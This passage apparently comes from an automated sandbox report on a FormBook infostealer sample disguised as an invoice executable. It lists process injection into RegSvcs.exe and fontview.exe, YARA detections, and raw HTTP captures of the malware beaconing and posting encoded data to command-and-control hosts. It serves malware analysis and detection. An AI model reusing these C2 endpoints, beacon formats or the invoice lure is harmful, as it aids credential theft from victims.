73 4f 5a 38 4f 42 45 6d 4e 53 6a 2b 64 43 4c 75 6a 2f 63 46 75 6a 62 4e 54 73 39 71 47 34 47 70 6f 4b 64 52 45 6c 55 78 61 4e 57 74 69 55 74 4a 47 4b 57 73 4d 57 57 6d 55 48 39 6d 49 45 64 72 78 76 52 69 6a 42 35 33 5a 74 53 49 42 79
                                                                                                                            Data Ascii: G0Yxd2Q=ydvTs2SH7a9ShPbsJMMH9sOp96F7WLBtoCs0+AB6KZgsCvc0EZbjvZIQPdv+30ibrzv8YUa6l6CO7j/8LcpUoLly5rhQLuIClOcXQewgcHuESlR+4DGn3E9MkqDJol0CvPHUFbsJl+6khDsyA1w5REJ1d6Z16srIjFMO21Vyq/nbTgkuCBPAaGnVyiMmQuFWjX9OvpnxLsWtJj+FK+gtZU8wIbWahySJ7Cmg7YhR62etrKtXsWm5n/ZSrIh73iK2EqmbwNB3MOmC2n/6jbQpKHqxwFpk7Li5lGEwTugeATa8LbspoYpjGqRk/fZPXvX9mbuiHzP7Oj9w6Uvh5E4mQG8rUchMufSrfHpUUyHTWvrNZiYUB61qwrbucFUKEEva3l64A8k6QgTcQ2XQtZgJaeNFgG0P4mkcEdvmJ4+lYjd9vlZEX/TwwwwSP7Qssxr8Mf4XPv4X+Y0cnz6c3tOqdkLghLDpJNAUd9T2PdRiNnbGJMxmSQlf/3OA3wSqYwutmVCq7btt/4yzS8Fk8q1NxxiIZbn6mXFyUqG6oD88L2JCrwNnl44dwjfGVz6+W0+ZF/S5ImRFOJRKq5k4ssAM691mFZP/RlZYIrUD1mgwuw6EkloKTt2k7SyzaA9nyB9JpsUJBdlguCyooRsF9kb83GVeJdpPYhk5sWMGmeERDbXHTr5q+qXEXuOkF7WEEk8myyfBNOXMGdrni7N0m6FFK+u4E0cqtOIfmMQXp1Cpm+soW5rwzeOpsc8IIvhaZL5GT+WrSJAc4FQ8F0I3a5EQwdyF3Wtyawo+2JqwRtwost/VQ5GkBqbJpmigDo2q7HHwBniL0sN1BTXCuTfdXH5/NmzIHKrNmMeQsqLFRd4KZ6/FAqeA3ZEwP+fEOp+zOTAAhg+KS8XYh+vftihtiHURBGhQ9UcLwb7LKuG69X8f2cJf7dJcG75A+5WnkRfAopAaLq8B/1bVCJk7l0PI3nmn9P0ZShwaVYg9IFS8nMrNor7sSe2gGhQSIQK6PsUD0hQ65hCgrLbfvOXXh3WilUyPH3xhGK+K/FYzsTW8GEI7sWobgfpzSBGr3XOKcIDutEnc8oMaxfStpRTeBauMkbFiFIO+W93ekRVVlRzRHnXgW9NXhEsOZ8OBEmNSj+dCLuj/cFujbNTs9qG4GpoKdRElUxaNWtiUtJGKWsMWWmUH9mIEdrxvRijB53ZtSIBy
                                                                                                                            Nov 10, 2023 09:28:05.615788937 CET141INHTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:28:05 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            8192.168.2.104972391.195.240.12380C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:28:08.134658098 CET142OUTGET /udwf/?G0Yxd2Q=/fHzvDGB04J+q8b6XJE1xYe30bxweLJnilom5C96GpM+NoY5L9yFqNs9P5GPx0eLkQDxLFeKj8P05w7qGZ9X0/BmwspDAeolpA==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.bellcom.media
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Nov 10, 2023 09:28:08.494031906 CET143INHTTP/1.1 200 OK
                                                                                                                            date: Fri, 10 Nov 2023 08:28:08 GMT
                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                            transfer-encoding: chunked
                                                                                                                            vary: Accept-Encoding
                                                                                                                            x-powered-by: PHP/8.1.17
                                                                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                            pragma: no-cache
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_K6T6EgKDNpycVcTI448yZh4Whwi6908edQ5ne9vwqzeDCUwGdehL4WTJXqvsuTowv27KwmYZBTVhLLhotUnz9A==
                                                                                                                            last-modified: Fri, 10 Nov 2023 08:28:08 GMT
                                                                                                                            x-cache-miss-from: parking-698fb476bf-xftqn
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 4b 36 54 36 45 67 4b 44 4e 70 79 63 56 63 54 49 34 34 38 79 5a 68 34 57 68 77 69 36 39 30 38 65 64 51 35 6e 65 39 76 77 71 7a 65 44 43 55 77 47 64 65 68 4c 34 57 54 4a 58 71 76 73 75 54 6f 77 76 32 37 4b 77 6d 59 5a 42 54 56 68 4c 4c 68 6f 74 55 6e 7a 39 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 62 65 6c 6c 63 6f 6d 2e 6d 65 64 69 61 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 62 65 6c 6c 63 6f 6d 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 62 65 6c 6c 63 6f 6d 2e 6d 65 64 69 61 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20
                                                                                                                            Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_K6T6EgKDNpycVcTI448yZh4Whwi6908edQ5ne9vwqzeDCUwGdehL4WTJXqvsuTowv27KwmYZBTVhLLhotUnz9A==><head><meta charset="utf-8"><title>bellcom.media&nbsp;-&nbsp;bellcom Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="bellcom.media is your first and best source for all of the information youre looking for. From general
                                                                                                                            Nov 10, 2023 09:28:08.494050026 CET144INData Raw: 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 62 65 6c 6c 63 6f 6d 2e 6d 65 64 69 61 20 68 61 73 20 69 74 20 61 6c 6c 2e 20 57 65
                                                                                                                            Data Ascii: topics to more of what you would expect to find here, bellcom.media has it all. We hope you find what you AECare searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_log
                                                                                                                            Nov 10, 2023 09:28:08.494061947 CET146INData Raw: 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 2a 7a 6f 6f 6d 3a 31 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f
                                                                                                                            Data Ascii: lock}audio,canvas,video{display:inline-block;*display:inline;*zoom:1}audio:not([controls]){display:none;height:0}[hidden]{display:none}html{font-size:100%;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}html,button,input,select,textare
                                                                                                                            Nov 10, 2023 09:28:08.494076014 CET147INData Raw: 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 30 7d 66 6f 72 6d 7b 6d 61 72 67 69 6e 3a 30 7d 66 69 65 6c 64 73 65 74 7b 62 6f 72 64 65 72 3a 30 20 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 6c 65 67 65 6e 64 7b 62 6f 72
                                                                                                                            Data Ascii: figure{margin:0}form{margin:0}fieldset{border:0 none;margin:0;padding:0}legend{border:0;padding:0;white-space:normal;*margin-left:-7px}button,input,select,textarea{font-size:100%;margin:0;vertical-align:middle;*vertical-align:middle}button,inp
                                                                                                                            Nov 10, 2023 09:28:08.494088888 CET148INData Raw: 61 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 72 69 67 68 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 67 72 69 64 2d 61 72 65 61 3a 31 2f 32 2f 32 2f 36 7d 2e 6c 65 66 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67
                                                                                                                            Data Ascii: a{color:#949494}.right-container{grid-area:1/2/2/6}.left-container{background-image:url("https://img.sedoparking.com/templates/bg/NameSiloLogo.png");background-size:60vw;background-position:center;background-repeat:no-repeat;height:40px;text-a
                                                                                                                            Nov 10, 2023 09:28:08.494168997 CET150INData Raw: 2e 35 65 6d 20 33 30 70 78 3b 63 6c 65 61 72 3a 62 6f 74 68 7d 23 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 62 6f 74 74 6f 6d 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b
                                                                                                                            Data Ascii: .5em 30px;clear:both}#container-cookie-message{position:fixed;bottom:0;width:100%;background:#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}#container-cookie-message p,#container-cookie-message a{color:#a0a0a0}#container-cookie-me
                                                                                                                            Nov 10, 2023 09:28:08.494184017 CET150INData Raw: 76 65 3a 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e 63 6f 6e 74 65 6e 74 2d 77 65 62 61 72 63 68 69 76 65 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 70 61 64 64 69
                                                                                                                            Data Ascii: ve::after{clear:both}.content-webarchive h2{font-size:1.2em;font-weight:bold;padding-bottom:20px}.content-webarchive div{width:100%}.content-webarchive div .webarchive-block{padding:7px 0}.content-webarchive div .webarchive-block h3{font-weigh
                                                                                                                            Nov 10, 2023 09:28:08.494195938 CET152INData Raw: 31 35 44 38 0d 0a 72 63 68 69 76 65 2d 62 6c 6f 63 6b 20 75 6c 20 6c 69 7b 70 61 64 64 69 6e 67 3a 39 70 78 20 38 70 78 20 38 70 78 20 31 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f
                                                                                                                            Data Ascii: 15D8rchive-block ul li{padding:9px 8px 8px 10px;background:linear-gradient(to bottom, #444 0, #363636 100%)}.content-webarchive div .webarchive-block ul li:first-child{border-top:1px solid #ccc;border-top-left-radius:10px;border-top-right-ra
                                                                                                                            Nov 10, 2023 09:28:08.494209051 CET153INData Raw: 64 3a 23 32 64 32 64 32 64 7d 23 63 6f 6e 74 61 69 6e 65 72 2d 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 23 35 39 35 39 35 39 7d 23 63 6f 6e 74 61 69 6e 65 72 2d 66 6f 6f 74 65 72 20 61 7b 63 6f 6c 6f 72 3a 23 35 39 35 39 35 39 7d 2e 64 6f 6d 61 69
                                                                                                                            Data Ascii: d:#2d2d2d}#container-footer{color:#595959}#container-footer a{color:#595959}.domain h1{color:#595959}.content-relatedlinks h2 span{color:#595959}.content-relatedlinks ul li{border-bottom-color:#ccc}.content-relatedlinks ul a:link,.content-rela
                                                                                                                            Nov 10, 2023 09:28:08.494220972 CET154INData Raw: 3a 23 33 36 33 36 33 36 7d 2e 63 6f 6e 74 65 6e 74 2d 77 65 62 61 72 63 68 69 76 65 20 68 32 7b 63 6f 6c 6f 72 3a 23 39 39 39 7d 2e 63 6f 6e 74 65 6e 74 2d 77 65 62 61 72 63 68 69 76 65 20 64 69 76 20 64 69 76 2e 77 65 62 61 72 63 68 69 76 65 2d
                                                                                                                            Data Ascii: :#363636}.content-webarchive h2{color:#999}.content-webarchive div div.webarchive-block h3 a:link,.content-webarchive div div.webarchive-block h3 a:visited{color:#595959}.content-webarchive div div.webarchive-block h3 a:active,.content-webarch
                                                                                                                            Nov 10, 2023 09:28:08.798624992 CET156INData Raw: 3a 32 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6c 6f 77 65 72 63 61 73 65 7d 23 63 6f 6e 74 61 69 6e 65 72 2d 73
                                                                                                                            Data Ascii: :2.2em;font-weight:bold;text-decoration:none;text-transform:lowercase}#container-sedologo{display:block;text-align:center}.oneclick.twot #container-content{margin-left:5%;margin-right:5%}.content-ads ul li{padding:.6em 0}.content-ads ul li::be


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            9192.168.2.104972484.32.84.3280C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:28:15.448548079 CET173OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.tutorwave.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.tutorwave.online
                                                                                                                            Referer: http://www.tutorwave.online/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 43 38 33 43 47 54 6c 65 32 6f 50 73 78 77 56 35 4c 70 51 53 46 5a 67 52 52 31 7a 79 35 34 52 68 74 52 55 57 4b 75 55 69 74 73 6e 67 75 37 57 32 48 6f 58 63 47 42 38 6a 65 69 7a 45 37 66 69 4e 4f 44 39 75 31 30 64 66 55 62 6f 68 72 33 36 6d 54 43 4c 56 6a 43 62 46 4c 6e 4d 42 43 46 79 74 7a 54 31 48 7a 49 52 79 4e 6a 68 30 34 79 48 62 55 4d 36 77 7a 59 4a 59 48 6b 2b 45 77 6d 59 65 61 6a 65 5a 33 44 32 35 38 42 4f 52 55 77 59 44 66 71 4b 70 52 49 6f 6e 64 39 4b 4d 5a 2f 78 61 55 64 37 36 6a 6c 66 6c 64 32 75 4a 37 43 33 6f 6e 77 3d 3d
                                                                                                                            Data Ascii: G0Yxd2Q=C83CGTle2oPsxwV5LpQSFZgRR1zy54RhtRUWKuUitsngu7W2HoXcGB8jeizE7fiNOD9u10dfUbohr36mTCLVjCbFLnMBCFytzT1HzIRyNjh04yHbUM6wzYJYHk+EwmYeajeZ3D258BORUwYDfqKpRIond9KMZ/xaUd76jlfld2uJ7C3onw==


                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Target ID:0
                                                                                                                            Start time:09:27:04
                                                                                                                            Start date:10/11/2023
                                                                                                                            Path:C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe
                                                                                                                            Imagebase:0xb60000
                                                                                                                            File size:965'632 bytes
                                                                                                                            MD5 hash:EEA9BF4A16AB377328A59BDE0A0C76DF
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:3
                                                                                                                            Start time:09:27:05
                                                                                                                            Start date:10/11/2023
                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                            Imagebase:0x70000
                                                                                                                            File size:45'984 bytes
                                                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:4
                                                                                                                            Start time:09:27:05
                                                                                                                            Start date:10/11/2023
                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                            Imagebase:0x910000
                                                                                                                            File size:45'984 bytes
                                                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1350789547.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1351383564.0000000001340000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1351383564.0000000001340000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1352780699.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1352780699.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:11
                                                                                                                            Start time:09:27:09
                                                                                                                            Start date:10/11/2023
                                                                                                                            Path:C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe"
                                                                                                                            Imagebase:0xcb0000
                                                                                                                            File size:140'800 bytes
                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3735552179.00000000042E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3735552179.00000000042E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:12
                                                                                                                            Start time:09:27:10
                                                                                                                            Start date:10/11/2023
                                                                                                                            Path:C:\Windows\SysWOW64\fontview.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\SysWOW64\fontview.exe
                                                                                                                            Imagebase:0x480000
                                                                                                                            File size:113'152 bytes
                                                                                                                            MD5 hash:8324ECE6961ADBE6120CCE9E0BC05F76
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3735548215.0000000004680000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3735623760.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3735623760.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:14
                                                                                                                            Start time:09:27:22
                                                                                                                            Start date:10/11/2023
                                                                                                                            Path:C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe"
                                                                                                                            Imagebase:0xcb0000
                                                                                                                            File size:140'800 bytes
                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3737944932.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3737944932.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:16
                                                                                                                            Start time:09:27:35
                                                                                                                            Start date:10/11/2023
                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                            Imagebase:0x7ff613480000
                                                                                                                            File size:676'768 bytes
                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Disassembly

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:11.8%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:241
                                                                                                                              Total number of Limit Nodes:21
